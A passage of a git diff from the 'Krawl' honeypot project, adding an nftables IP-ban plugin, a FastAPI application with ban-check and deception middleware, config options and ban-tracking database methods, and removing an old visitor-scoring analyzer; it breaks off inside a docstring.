HTTP requests +- Cron for scheduling + +## When to Use Nftables + +Check if your system uses nftables: + +```bash +sudo nft list tables +``` + +If this shows tables, you're using nftables. If you get command not found, use iptables instead. + +## Installation & Setup + +### 1. 
Create the [krawl-nftables.sh](krawl-nftables.sh) script + +```bash +#!/bin/bash + + +curl -s https://your-krawl-instance/your-dashboard-path/api/get_banlist?fwtype=iptables > /tmp/ips_to_ban.txt + + +sudo nft add set inet filter krawl_ban { type ipv4_addr \; } 2>/dev/null || true + + +while read -r ip; do + [[ -z "$ip" ]] && continue + sudo nft add element inet filter krawl_ban { "$ip" } +done < /tmp/ips_to_ban.txt + + +sudo nft add rule inet filter input ip saddr @krawl_ban counter drop 2>/dev/null || true + + +rm -f /tmp/ips_to_ban.txt +``` + +Make it executable: +```bash +sudo chmod +x ./krawl-nftables.sh +``` + +### 2. Test the Script + +```bash +sudo ./krawl-nftables.sh +``` + +### 3. Schedule with Cron + +Edit the root crontab: +```bash +sudo crontab -e +``` + +Add this line to sync IPs every hour: + +```bash +0 * * * * /path/to/krawl-nftables.sh +``` + +## Monitoring + +### Check the Blocking Set + +View blocked IPs: +```bash +sudo nft list set inet filter krawl_ban +``` + +Count blocked IPs: +```bash +sudo nft list set inet filter krawl_ban | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | wc -l +``` + +### Check Active Rules + +View all rules in the filter table: +```bash +sudo nft list table inet filter +``` + +Find Krawl-specific rules (with their handles): +```bash +sudo nft -a list chain inet filter input | grep krawl_ban +``` + +### Monitor in Real-Time + +Watch the drop rule's packet counter: +```bash +sudo watch -n 1 'nft list chain inet filter input | grep krawl_ban' +``` + +## Management Commands + +### Manually Block an IP + +```bash +sudo nft add element inet filter krawl_ban { 192.168.1.100 } +``` + +### Manually Unblock an IP + +```bash +sudo nft delete element inet filter krawl_ban { 192.168.1.100 } +``` + +### List All Blocked IPs + +```bash +sudo nft list set inet filter krawl_ban +``` + +### Clear All Blocked IPs + +```bash +sudo nft flush set inet filter krawl_ban +``` + +### Delete the Rule + +```bash +sudo nft delete rule inet filter input handle HANDLE  # replace HANDLE with the number shown by: sudo nft -a list chain inet filter input +``` + +## References + +- [Nftables Official 
Documentation](https://wiki.nftables.org/) +- [Nftables Quick Reference](https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes) +- [Linux Kernel Netfilter Guide](https://www.kernel.org/doc/html/latest/networking/netfilter/) +- [Nftables Man Page](https://man.archlinux.org/man/nft.8) diff --git a/plugins/nftables/krawl-nftables.sh b/plugins/nftables/krawl-nftables.sh new file mode 100644 index 0000000..cebbe9a --- /dev/null +++ b/plugins/nftables/krawl-nftables.sh @@ -0,0 +1,19 @@ +#!/bin/bash + +# Fetch malicious IPs to temporary file +curl -s https://your-krawl-instance/your-dashboard-path/api/get_banlist?fwtype=iptables > /tmp/ips_to_ban.txt + +# Create the set if it doesn't exist +sudo nft add set inet filter krawl_ban { type ipv4_addr \; } 2>/dev/null || true + +# Add IPs to the set +while read -r ip; do + [[ -z "$ip" ]] && continue + sudo nft add element inet filter krawl_ban { "$ip" } +done < /tmp/ips_to_ban.txt + +# Create the rule if it doesn't exist +sudo nft add rule inet filter input ip saddr @krawl_ban counter drop 2>/dev/null || true + +# Cleanup +rm -f /tmp/ips_to_ban.txt \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index b3f9b03..56dc4d4 100644 --- a/requirements.txt +++ b/requirements.txt @@ -11,3 +11,9 @@ SQLAlchemy>=2.0.0,<3.0.0 APScheduler>=3.11.2 requests>=2.32.5 + +# Web framework +fastapi>=0.115.0 +uvicorn[standard]>=0.30.0 +jinja2>=3.1.5 +python-multipart>=0.0.9 \ No newline at end of file diff --git a/src/analyzer.py b/src/analyzer.py deleted file mode 100644 index 7f29662..0000000 --- a/src/analyzer.py +++ /dev/null @@ -1,342 +0,0 @@ -#!/usr/bin/env python3 -from sqlalchemy import select -from typing import Optional -from database import get_database, DatabaseManager -from zoneinfo import ZoneInfo -from pathlib import Path -from datetime import datetime, timedelta -import re -import urllib.parse -from wordlists import get_wordlists -from config import get_config -from logger 
import get_app_logger -import requests - -""" -Functions for user activity analysis -""" - -app_logger = get_app_logger() - - -class Analyzer: - """ - Analyzes users activity and produces aggregated insights - """ - - def __init__(self, db_manager: Optional[DatabaseManager] = None): - """ - Initialize the analyzer. - - Args: - db_manager: Optional DatabaseManager for persistence. - If None, will use the global singleton. - """ - self._db_manager = db_manager - - @property - def db(self) -> Optional[DatabaseManager]: - """ - Get the database manager, lazily initializing if needed. - - Returns: - DatabaseManager instance or None if not available - """ - if self._db_manager is None: - try: - self._db_manager = get_database() - except Exception: - pass - return self._db_manager - - # def infer_user_category(self, ip: str) -> str: - - # config = get_config() - - # http_risky_methods_threshold = config.http_risky_methods_threshold - # violated_robots_threshold = config.violated_robots_threshold - # uneven_request_timing_threshold = config.uneven_request_timing_threshold - # user_agents_used_threshold = config.user_agents_used_threshold - # attack_urls_threshold = config.attack_urls_threshold - # uneven_request_timing_time_window_seconds = config.uneven_request_timing_time_window_seconds - - # app_logger.debug(f"http_risky_methods_threshold: {http_risky_methods_threshold}") - - # score = {} - # score["attacker"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - # score["good_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - # score["bad_crawler"] = {"risky_http_methods": False, "robots_violations": False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - # score["regular_user"] = {"risky_http_methods": False, "robots_violations": 
False, "uneven_request_timing": False, "different_user_agents": False, "attack_url": False} - - # #1-3 low, 4-6 mid, 7-9 high, 10-20 extreme - # weights = { - # "attacker": { - # "risky_http_methods": 6, - # "robots_violations": 4, - # "uneven_request_timing": 3, - # "different_user_agents": 8, - # "attack_url": 15 - # }, - # "good_crawler": { - # "risky_http_methods": 1, - # "robots_violations": 0, - # "uneven_request_timing": 0, - # "different_user_agents": 0, - # "attack_url": 0 - # }, - # "bad_crawler": { - # "risky_http_methods": 2, - # "robots_violations": 7, - # "uneven_request_timing": 0, - # "different_user_agents": 5, - # "attack_url": 5 - # }, - # "regular_user": { - # "risky_http_methods": 0, - # "robots_violations": 0, - # "uneven_request_timing": 8, - # "different_user_agents": 3, - # "attack_url": 0 - # } - # } - - # accesses = self.db.get_access_logs(ip_filter = ip, limit=1000) - # total_accesses_count = len(accesses) - # if total_accesses_count <= 0: - # return - - # # Set category as "unknown" for the first 5 requests - # if total_accesses_count < 3: - # category = "unknown" - # analyzed_metrics = {} - # category_scores = {"attacker": 0, "good_crawler": 0, "bad_crawler": 0, "regular_user": 0, "unknown": 0} - # last_analysis = datetime.now(tz=ZoneInfo('UTC')) - # self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, last_analysis) - # return 0 - - # #--------------------- HTTP Methods --------------------- - - # get_accesses_count = len([item for item in accesses if item["method"] == "GET"]) - # post_accesses_count = len([item for item in accesses if item["method"] == "POST"]) - # put_accesses_count = len([item for item in accesses if item["method"] == "PUT"]) - # delete_accesses_count = len([item for item in accesses if item["method"] == "DELETE"]) - # head_accesses_count = len([item for item in accesses if item["method"] == "HEAD"]) - # options_accesses_count = len([item for item in accesses if item["method"] 
== "OPTIONS"]) - # patch_accesses_count = len([item for item in accesses if item["method"] == "PATCH"]) - - # if total_accesses_count > http_risky_methods_threshold: - # http_method_attacker_score = (post_accesses_count + put_accesses_count + delete_accesses_count + options_accesses_count + patch_accesses_count) / total_accesses_count - # else: - # http_method_attacker_score = 0 - - # #print(f"HTTP Method attacker score: {http_method_attacker_score}") - # if http_method_attacker_score >= http_risky_methods_threshold: - # score["attacker"]["risky_http_methods"] = True - # score["good_crawler"]["risky_http_methods"] = False - # score["bad_crawler"]["risky_http_methods"] = True - # score["regular_user"]["risky_http_methods"] = False - # else: - # score["attacker"]["risky_http_methods"] = False - # score["good_crawler"]["risky_http_methods"] = True - # score["bad_crawler"]["risky_http_methods"] = False - # score["regular_user"]["risky_http_methods"] = False - - # #--------------------- Robots Violations --------------------- - # #respect robots.txt and login/config pages access frequency - # robots_disallows = [] - # robots_path = Path(__file__).parent / "templates" / "html" / "robots.txt" - # with open(robots_path, "r") as f: - # for line in f: - # line = line.strip() - # if not line: - # continue - # parts = line.split(":") - - # if parts[0] == "Disallow": - # parts[1] = parts[1].rstrip("/") - # #print(f"DISALLOW {parts[1]}") - # robots_disallows.append(parts[1].strip()) - - # #if 0 100% sure is good crawler, if >10% of robots violated is bad crawler or attacker - # violated_robots_count = len([item for item in accesses if any(item["path"].rstrip("/").startswith(disallow) for disallow in robots_disallows)]) - # #print(f"Violated robots count: {violated_robots_count}") - # if total_accesses_count > 0: - # violated_robots_ratio = violated_robots_count / total_accesses_count - # else: - # violated_robots_ratio = 0 - - # if violated_robots_ratio >= 
violated_robots_threshold: - # score["attacker"]["robots_violations"] = True - # score["good_crawler"]["robots_violations"] = False - # score["bad_crawler"]["robots_violations"] = True - # score["regular_user"]["robots_violations"] = False - # else: - # score["attacker"]["robots_violations"] = False - # score["good_crawler"]["robots_violations"] = False - # score["bad_crawler"]["robots_violations"] = False - # score["regular_user"]["robots_violations"] = False - - # #--------------------- Requests Timing --------------------- - # #Request rate and timing: steady, throttled, polite vs attackers' bursty, aggressive, or oddly rhythmic behavior - # timestamps = [datetime.fromisoformat(item["timestamp"]) for item in accesses] - # now_utc = datetime.now(tz=ZoneInfo('UTC')) - # timestamps = [ts for ts in timestamps if now_utc - ts <= timedelta(seconds=uneven_request_timing_time_window_seconds)] - # timestamps = sorted(timestamps, reverse=True) - - # time_diffs = [] - # for i in range(0, len(timestamps)-1): - # diff = (timestamps[i] - timestamps[i+1]).total_seconds() - # time_diffs.append(diff) - - # mean = 0 - # variance = 0 - # std = 0 - # cv = 0 - # if time_diffs: - # mean = sum(time_diffs) / len(time_diffs) - # variance = sum((x - mean) ** 2 for x in time_diffs) / len(time_diffs) - # std = variance ** 0.5 - # cv = std/mean - # app_logger.debug(f"Mean: {mean} - Variance {variance} - Standard Deviation {std} - Coefficient of Variation: {cv}") - - # if cv >= uneven_request_timing_threshold: - # score["attacker"]["uneven_request_timing"] = True - # score["good_crawler"]["uneven_request_timing"] = False - # score["bad_crawler"]["uneven_request_timing"] = False - # score["regular_user"]["uneven_request_timing"] = True - # else: - # score["attacker"]["uneven_request_timing"] = False - # score["good_crawler"]["uneven_request_timing"] = False - # score["bad_crawler"]["uneven_request_timing"] = False - # score["regular_user"]["uneven_request_timing"] = False - - # 
#--------------------- Different User Agents --------------------- - # #Header Quality and Consistency: Crawlers tend to use complete and consistent headers, attackers might miss, fake, or change headers - # user_agents_used = [item["user_agent"] for item in accesses] - # user_agents_used = list(dict.fromkeys(user_agents_used)) - # #print(f"User agents used: {user_agents_used}") - - # if len(user_agents_used) >= user_agents_used_threshold: - # score["attacker"]["different_user_agents"] = True - # score["good_crawler"]["different_user_agents"] = False - # score["bad_crawler"]["different_user_agentss"] = True - # score["regular_user"]["different_user_agents"] = False - # else: - # score["attacker"]["different_user_agents"] = False - # score["good_crawler"]["different_user_agents"] = False - # score["bad_crawler"]["different_user_agents"] = False - # score["regular_user"]["different_user_agents"] = False - - # #--------------------- Attack URLs --------------------- - - # attack_urls_found_list = [] - - # wl = get_wordlists() - # if wl.attack_patterns: - # queried_paths = [item["path"] for item in accesses] - - # for queried_path in queried_paths: - # # URL decode the path to catch encoded attacks - # try: - # decoded_path = urllib.parse.unquote(queried_path) - # # Double decode to catch double-encoded attacks - # decoded_path_twice = urllib.parse.unquote(decoded_path) - # except Exception: - # decoded_path = queried_path - # decoded_path_twice = queried_path - - # for name, pattern in wl.attack_patterns.items(): - # # Check original, decoded, and double-decoded paths - # if (re.search(pattern, queried_path, re.IGNORECASE) or - # re.search(pattern, decoded_path, re.IGNORECASE) or - # re.search(pattern, decoded_path_twice, re.IGNORECASE)): - # attack_urls_found_list.append(f"{name}: {pattern}") - - # #remove duplicates - # attack_urls_found_list = set(attack_urls_found_list) - # attack_urls_found_list = list(attack_urls_found_list) - - # if len(attack_urls_found_list) 
> attack_urls_threshold: - # score["attacker"]["attack_url"] = True - # score["good_crawler"]["attack_url"] = False - # score["bad_crawler"]["attack_url"] = False - # score["regular_user"]["attack_url"] = False - # else: - # score["attacker"]["attack_url"] = False - # score["good_crawler"]["attack_url"] = False - # score["bad_crawler"]["attack_url"] = False - # score["regular_user"]["attack_url"] = False - - # #--------------------- Calculate score --------------------- - - # attacker_score = good_crawler_score = bad_crawler_score = regular_user_score = 0 - - # attacker_score = score["attacker"]["risky_http_methods"] * weights["attacker"]["risky_http_methods"] - # attacker_score = attacker_score + score["attacker"]["robots_violations"] * weights["attacker"]["robots_violations"] - # attacker_score = attacker_score + score["attacker"]["uneven_request_timing"] * weights["attacker"]["uneven_request_timing"] - # attacker_score = attacker_score + score["attacker"]["different_user_agents"] * weights["attacker"]["different_user_agents"] - # attacker_score = attacker_score + score["attacker"]["attack_url"] * weights["attacker"]["attack_url"] - - # good_crawler_score = score["good_crawler"]["risky_http_methods"] * weights["good_crawler"]["risky_http_methods"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["robots_violations"] * weights["good_crawler"]["robots_violations"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["uneven_request_timing"] * weights["good_crawler"]["uneven_request_timing"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["different_user_agents"] * weights["good_crawler"]["different_user_agents"] - # good_crawler_score = good_crawler_score + score["good_crawler"]["attack_url"] * weights["good_crawler"]["attack_url"] - - # bad_crawler_score = score["bad_crawler"]["risky_http_methods"] * weights["bad_crawler"]["risky_http_methods"] - # bad_crawler_score = bad_crawler_score + 
score["bad_crawler"]["robots_violations"] * weights["bad_crawler"]["robots_violations"] - # bad_crawler_score = bad_crawler_score + score["bad_crawler"]["uneven_request_timing"] * weights["bad_crawler"]["uneven_request_timing"] - # bad_crawler_score = bad_crawler_score + score["bad_crawler"]["different_user_agents"] * weights["bad_crawler"]["different_user_agents"] - # bad_crawler_score = bad_crawler_score + score["bad_crawler"]["attack_url"] * weights["bad_crawler"]["attack_url"] - - # regular_user_score = score["regular_user"]["risky_http_methods"] * weights["regular_user"]["risky_http_methods"] - # regular_user_score = regular_user_score + score["regular_user"]["robots_violations"] * weights["regular_user"]["robots_violations"] - # regular_user_score = regular_user_score + score["regular_user"]["uneven_request_timing"] * weights["regular_user"]["uneven_request_timing"] - # regular_user_score = regular_user_score + score["regular_user"]["different_user_agents"] * weights["regular_user"]["different_user_agents"] - # regular_user_score = regular_user_score + score["regular_user"]["attack_url"] * weights["regular_user"]["attack_url"] - - # score_details = f""" - # Attacker score: {attacker_score} - # Good Crawler score: {good_crawler_score} - # Bad Crawler score: {bad_crawler_score} - # Regular User score: {regular_user_score} - # """ - # app_logger.debug(score_details) - - # analyzed_metrics = {"risky_http_methods": http_method_attacker_score, "robots_violations": violated_robots_ratio, "uneven_request_timing": mean, "different_user_agents": user_agents_used, "attack_url": attack_urls_found_list} - # category_scores = {"attacker": attacker_score, "good_crawler": good_crawler_score, "bad_crawler": bad_crawler_score, "regular_user": regular_user_score} - # category = max(category_scores, key=category_scores.get) - # last_analysis = datetime.now(tz=ZoneInfo('UTC')) - - # self._db_manager.update_ip_stats_analysis(ip, analyzed_metrics, category, category_scores, 
last_analysis) - - # return 0 - - # def update_ip_rep_infos(self, ip: str) -> list[str]: - # api_url = "https://iprep.lcrawl.com/api/iprep/" - # params = { - # "cidr": ip - # } - # headers = { - # "Content-Type": "application/json" - # } - - # response = requests.get(api_url, headers=headers, params=params) - # payload = response.json() - - # if payload["results"]: - # data = payload["results"][0] - - # country_iso_code = data["geoip_data"]["country_iso_code"] - # asn = data["geoip_data"]["asn_autonomous_system_number"] - # asn_org = data["geoip_data"]["asn_autonomous_system_organization"] - # list_on = data["list_on"] - - # sanitized_country_iso_code = sanitize_for_storage(country_iso_code, 3) - # sanitized_asn = sanitize_for_storage(asn, 100) - # sanitized_asn_org = sanitize_for_storage(asn_org, 100) - # sanitized_list_on = sanitize_dict(list_on, 100000) - - # self._db_manager.update_ip_rep_infos(ip, sanitized_country_iso_code, sanitized_asn, sanitized_asn_org, sanitized_list_on) - - # return diff --git a/src/app.py b/src/app.py new file mode 100644 index 0000000..2b2df92 --- /dev/null +++ b/src/app.py @@ -0,0 +1,151 @@ +#!/usr/bin/env python3 + +""" +FastAPI application factory for the Krawl honeypot. +Replaces the old http.server-based server.py. 
+""" + +import sys +import os +from contextlib import asynccontextmanager + +from fastapi import FastAPI, Request, Response +from fastapi.staticfiles import StaticFiles + +from config import get_config +from tracker import AccessTracker, set_tracker +from database import initialize_database +from tasks_master import get_tasksmaster +from logger import initialize_logging, get_app_logger +from generators import random_server_header + + +@asynccontextmanager +async def lifespan(app: FastAPI): + """Application startup and shutdown lifecycle.""" + config = get_config() + + # Initialize logging + initialize_logging(log_level=config.log_level) + app_logger = get_app_logger() + + # Initialize database and run pending migrations before accepting traffic + try: + app_logger.info(f"Initializing database at: {config.database_path}") + initialize_database(config.database_path) + app_logger.info("Database ready") + except Exception as e: + app_logger.warning( + f"Database initialization failed: {e}. Continuing with in-memory only." + ) + + # Initialize tracker + tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds) + set_tracker(tracker) + + # Store in app.state for dependency injection + app.state.config = config + app.state.tracker = tracker + + # Load webpages file if provided via env var + webpages = None + webpages_file = os.environ.get("KRAWL_WEBPAGES_FILE") + if webpages_file: + try: + with open(webpages_file, "r") as f: + webpages = f.readlines() + if not webpages: + app_logger.warning( + "The webpages file was empty. Using randomly generated links." + ) + webpages = None + except IOError: + app_logger.warning( + "Can't read webpages file. Using randomly generated links." 
+ ) + app.state.webpages = webpages + + # Initialize canary counter + app.state.counter = config.canary_token_tries + + # Start scheduled tasks + tasks_master = get_tasksmaster() + tasks_master.run_scheduled_tasks() + + banner = f""" + +============================================================ +DASHBOARD AVAILABLE AT +{config.dashboard_secret_path} +============================================================ + """ + app_logger.info(banner) + app_logger.info(f"Starting deception server on port {config.port}...") + if config.canary_token_url: + app_logger.info( + f"Canary token will appear after {config.canary_token_tries} tries" + ) + else: + app_logger.info("No canary token configured (set CANARY_TOKEN_URL to enable)") + + yield + + # Shutdown + app_logger.info("Server shutting down...") + + +def create_app() -> FastAPI: + """Create and configure the FastAPI application.""" + application = FastAPI( + docs_url=None, + redoc_url=None, + openapi_url=None, + lifespan=lifespan, + ) + + # Random server header middleware (innermost — runs last on request, first on response) + @application.middleware("http") + async def server_header_middleware(request: Request, call_next): + response: Response = await call_next(request) + response.headers["Server"] = random_server_header() + return response + + # Deception detection middleware (path traversal, XXE, command injection) + from middleware.deception import DeceptionMiddleware + + application.add_middleware(DeceptionMiddleware) + + # Banned IP check middleware (outermost — runs first on request) + from middleware.ban_check import BanCheckMiddleware + + application.add_middleware(BanCheckMiddleware) + + # Mount static files for the dashboard + config = get_config() + secret = config.dashboard_secret_path.lstrip("/") + static_dir = os.path.join(os.path.dirname(__file__), "templates", "static") + application.mount( + f"/{secret}/static", + StaticFiles(directory=static_dir), + name="dashboard-static", + ) + + # Import and 
include routers + from routes.honeypot import router as honeypot_router + from routes.api import router as api_router + from routes.dashboard import router as dashboard_router + from routes.htmx import router as htmx_router + + # Dashboard/API/HTMX routes (prefixed with secret path, before honeypot catch-all) + dashboard_prefix = f"/{secret}" + application.include_router(dashboard_router, prefix=dashboard_prefix) + application.include_router(api_router, prefix=dashboard_prefix) + application.include_router(htmx_router, prefix=dashboard_prefix) + + # Honeypot routes (catch-all must be last) + application.include_router(honeypot_router) + + return application + + +app = create_app() diff --git a/src/config.py b/src/config.py index 3e5983f..cb46bf6 100644 --- a/src/config.py +++ b/src/config.py @@ -37,6 +37,13 @@ class Config: infinite_pages_for_malicious: bool = True # Infinite pages for malicious crawlers ban_duration_seconds: int = 600 # Ban duration in seconds for IPs exceeding limits + # exporter settings + exports_path: str = "exports" + + # backup job settings + backups_path: str = "backups" + backups_enabled: bool = False + backups_cron: str = "*/30 * * * *" # Database settings database_path: str = "data/krawl.db" database_retention_days: int = 30 @@ -49,6 +56,8 @@ class Config: user_agents_used_threshold: float = None attack_urls_threshold: float = None + log_level: str = "INFO" + _server_ip: Optional[str] = None _server_ip_cache_time: float = 0 _ip_cache_ttl: int = 300 @@ -85,7 +94,7 @@ class Config: ip = response.text.strip() if ip: break - except Exception: + except requests.RequestException: continue if not ip: @@ -150,10 +159,13 @@ class Config: canary = data.get("canary", {}) dashboard = data.get("dashboard", {}) api = data.get("api", {}) + exports = data.get("exports", {}) + backups = data.get("backups", {}) database = data.get("database", {}) behavior = data.get("behavior", {}) analyzer = data.get("analyzer") or {} crawl = data.get("crawl", {}) + 
logging_cfg = data.get("logging", {}) # Handle dashboard_secret_path - auto-generate if null/not set dashboard_path = dashboard.get("secret_path") @@ -185,6 +197,10 @@ class Config: canary_token_tries=canary.get("token_tries", 10), dashboard_secret_path=dashboard_path, probability_error_codes=behavior.get("probability_error_codes", 0), + exports_path=exports.get("path", "exports"), + backups_path=backups.get("path", "backups"), + backups_enabled=backups.get("enabled", False), + backups_cron=backups.get("cron"), database_path=database.get("path", "data/krawl.db"), database_retention_days=database.get("retention_days", 30), http_risky_methods_threshold=analyzer.get( @@ -204,6 +220,9 @@ class Config: ), max_pages_limit=crawl.get("max_pages_limit", 250), ban_duration_seconds=crawl.get("ban_duration_seconds", 600), + log_level=os.getenv( + "KRAWL_LOG_LEVEL", logging_cfg.get("level", "INFO") + ).upper(), ) diff --git a/src/database.py b/src/database.py index 36cc7e1..cbee4a0 100644 --- a/src/database.py +++ b/src/database.py @@ -97,6 +97,11 @@ class DatabaseManager: # Run automatic migrations for backward compatibility self._run_migrations(database_path) + # Run schema migrations (columns & indexes on existing tables) + from migrations.runner import run_migrations + + run_migrations(database_path) + # Set restrictive file permissions (owner read/write only) if os.path.exists(database_path): try: @@ -137,6 +142,41 @@ class DatabaseManager: cursor.execute("ALTER TABLE ip_stats ADD COLUMN longitude REAL") migrations_run.append("longitude") + # Add new geolocation columns + if "country" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN country VARCHAR(100)") + migrations_run.append("country") + + if "region" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN region VARCHAR(2)") + migrations_run.append("region") + + if "region_name" not in columns: + cursor.execute( + "ALTER TABLE ip_stats ADD COLUMN region_name VARCHAR(100)" + ) + 
migrations_run.append("region_name") + + if "timezone" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN timezone VARCHAR(50)") + migrations_run.append("timezone") + + if "isp" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN isp VARCHAR(100)") + migrations_run.append("isp") + + if "is_proxy" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN is_proxy BOOLEAN") + migrations_run.append("is_proxy") + + if "is_hosting" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN is_hosting BOOLEAN") + migrations_run.append("is_hosting") + + if "reverse" not in columns: + cursor.execute("ALTER TABLE ip_stats ADD COLUMN reverse VARCHAR(255)") + migrations_run.append("reverse") + if migrations_run: conn.commit() applogger.info( @@ -172,6 +212,7 @@ class DatabaseManager: is_honeypot_trigger: bool = False, attack_types: Optional[List[str]] = None, matched_patterns: Optional[Dict[str, str]] = None, + raw_request: Optional[str] = None, ) -> Optional[int]: """ Persist an access log entry to the database. 
# DatabaseManager methods: page-visit counting and ban bookkeeping.


def increment_page_visit(self, ip: str, max_pages_limit: int) -> int:
    """
    Increment the page visit counter for an IP and apply a ban if the limit is reached.

    A missing IpStats row is created on the fly and then goes through the same
    limit check as an existing row, so the threshold is also honoured on the
    very first visit of an unknown IP.

    Args:
        ip: Client IP address
        max_pages_limit: Page visit threshold before banning

    Returns:
        The updated page visit count, or 0 if the update failed
    """
    session = self.session
    try:
        sanitized_ip = sanitize_ip(ip)
        ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first()

        if not ip_stats:
            now = datetime.now()
            ip_stats = IpStats(
                ip=sanitized_ip,
                total_requests=0,
                first_seen=now,
                last_seen=now,
                page_visit_count=0,
            )
            session.add(ip_stats)

        visits = (ip_stats.page_visit_count or 0) + 1
        ip_stats.page_visit_count = visits

        if visits >= max_pages_limit:
            # Every violation doubles the ban multiplier: 1, 2, 4, ...
            violations = (ip_stats.total_violations or 0) + 1
            ip_stats.total_violations = violations
            ip_stats.ban_multiplier = 2 ** (violations - 1)
            ip_stats.ban_timestamp = datetime.now()

        session.commit()
        return visits

    except Exception as e:
        session.rollback()
        applogger.error(f"Error incrementing page visit for {ip}: {e}")
        return 0
    finally:
        self.close_session()


def is_banned_ip(self, ip: str, ban_duration_seconds: int) -> bool:
    """
    Check if an IP is currently banned.

    When the ban has expired, the page visit counter and the ban timestamp
    are reset and committed before returning False.

    Args:
        ip: Client IP address
        ban_duration_seconds: Base ban duration in seconds (scaled by the
            IP's ban multiplier)

    Returns:
        True if the IP is currently banned; False otherwise, including when
        the lookup fails
    """
    session = self.session
    try:
        sanitized_ip = sanitize_ip(ip)
        ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first()

        if not ip_stats or ip_stats.ban_timestamp is None:
            return False

        effective_duration = ban_duration_seconds * (ip_stats.ban_multiplier or 1)
        elapsed = (datetime.now() - ip_stats.ban_timestamp).total_seconds()

        if elapsed > effective_duration:
            # Ban expired — reset count for next cycle
            ip_stats.page_visit_count = 0
            ip_stats.ban_timestamp = None
            session.commit()
            return False

        return True

    except Exception as e:
        # The expiry branch writes; undo a failed commit like the other writers do.
        session.rollback()
        applogger.error(f"Error checking ban status for {ip}: {e}")
        return False
    finally:
        self.close_session()


def get_ban_info(self, ip: str, ban_duration_seconds: int) -> dict:
    """
    Get detailed ban information for an IP.

    Args:
        ip: Client IP address
        ban_duration_seconds: Base ban duration in seconds

    Returns:
        Dictionary with "is_banned", "violations", "ban_multiplier" and
        "remaining_ban_seconds". "effective_ban_duration_seconds" is only
        present when the IP has a ban timestamp recorded.
    """

    def _not_banned(violations: int = 0, multiplier: int = 1) -> dict:
        # Shape shared by the "no record", "never banned" and error answers.
        return {
            "is_banned": False,
            "violations": violations,
            "ban_multiplier": multiplier,
            "remaining_ban_seconds": 0,
        }

    session = self.session
    try:
        sanitized_ip = sanitize_ip(ip)
        ip_stats = session.query(IpStats).filter(IpStats.ip == sanitized_ip).first()

        if not ip_stats:
            return _not_banned()

        violations = ip_stats.total_violations or 0
        multiplier = ip_stats.ban_multiplier or 1

        if ip_stats.ban_timestamp is None:
            return _not_banned(violations, multiplier)

        effective_duration = ban_duration_seconds * multiplier
        elapsed = (datetime.now() - ip_stats.ban_timestamp).total_seconds()
        remaining = max(0, effective_duration - elapsed)

        return {
            "is_banned": remaining > 0,
            "violations": violations,
            "ban_multiplier": multiplier,
            "effective_ban_duration_seconds": effective_duration,
            "remaining_ban_seconds": remaining,
        }

    except Exception as e:
        applogger.error(f"Error getting ban info for {ip}: {e}")
        return _not_banned()
    finally:
        self.close_session()
# DatabaseManager methods: reevaluation flags, paginated access logs, public-IP filter.


def get_ips_needing_reevaluation(self) -> List[str]:
    """
    Get all IP addresses that need evaluation.

    Returns:
        List of IP addresses where need_reevaluation is True
        or that have never been analyzed (last_analysis is NULL)
    """
    session = self.session
    try:
        pending = or_(
            IpStats.need_reevaluation == True,  # noqa: E712 - SQL expression
            IpStats.last_analysis.is_(None),
        )
        rows = session.query(IpStats.ip).filter(pending).all()
        return [row[0] for row in rows]
    finally:
        self.close_session()


def flag_stale_ips_for_reevaluation(self) -> int:
    """
    Flag IPs for reevaluation where:
    - last_seen is between 5 and 30 days ago
    - last_analysis is more than 5 days ago

    IPs already flagged or carrying a manual category are left untouched.

    Returns:
        Number of IPs flagged for reevaluation

    Raises:
        Exception: any database error, re-raised after the transaction is
            rolled back
    """
    session = self.session
    try:
        now = datetime.now()
        last_seen_lower = now - timedelta(days=30)
        last_seen_upper = now - timedelta(days=5)
        last_analysis_cutoff = now - timedelta(days=5)

        count = (
            session.query(IpStats)
            .filter(
                IpStats.last_seen >= last_seen_lower,
                IpStats.last_seen <= last_seen_upper,
                IpStats.last_analysis <= last_analysis_cutoff,
                IpStats.need_reevaluation == False,  # noqa: E712
                IpStats.manual_category == False,  # noqa: E712
            )
            .update(
                {IpStats.need_reevaluation: True},
                synchronize_session=False,
            )
        )
        session.commit()
        return count
    except Exception:
        session.rollback()
        raise
    finally:
        # Release the session like every other DatabaseManager method does.
        self.close_session()


def flag_all_ips_for_reevaluation(self) -> int:
    """
    Flag ALL IPs for reevaluation, regardless of staleness.
    Skips IPs that have a manual category set.

    Returns:
        Number of IPs flagged for reevaluation

    Raises:
        Exception: any database error, re-raised after the transaction is
            rolled back
    """
    session = self.session
    try:
        count = (
            session.query(IpStats)
            .filter(
                IpStats.need_reevaluation == False,  # noqa: E712
                IpStats.manual_category == False,  # noqa: E712
            )
            .update(
                {IpStats.need_reevaluation: True},
                synchronize_session=False,
            )
        )
        session.commit()
        return count
    except Exception:
        session.rollback()
        raise
    finally:
        # Release the session like every other DatabaseManager method does.
        self.close_session()


def get_access_logs_paginated(
    self,
    page: int = 1,
    page_size: int = 25,
    ip_filter: Optional[str] = None,
    suspicious_only: bool = False,
    since_minutes: Optional[int] = None,
) -> Dict[str, Any]:
    """
    Retrieve access logs with pagination and optional filtering.

    The pagination totals are computed from the same filters as the returned
    page, so they stay correct with or without an IP filter.

    Args:
        page: Page to retrieve (1-indexed)
        page_size: Number of records per page
        ip_filter: Filter by IP address
        suspicious_only: Only return suspicious requests
        since_minutes: Only return logs from the last N minutes

    Returns:
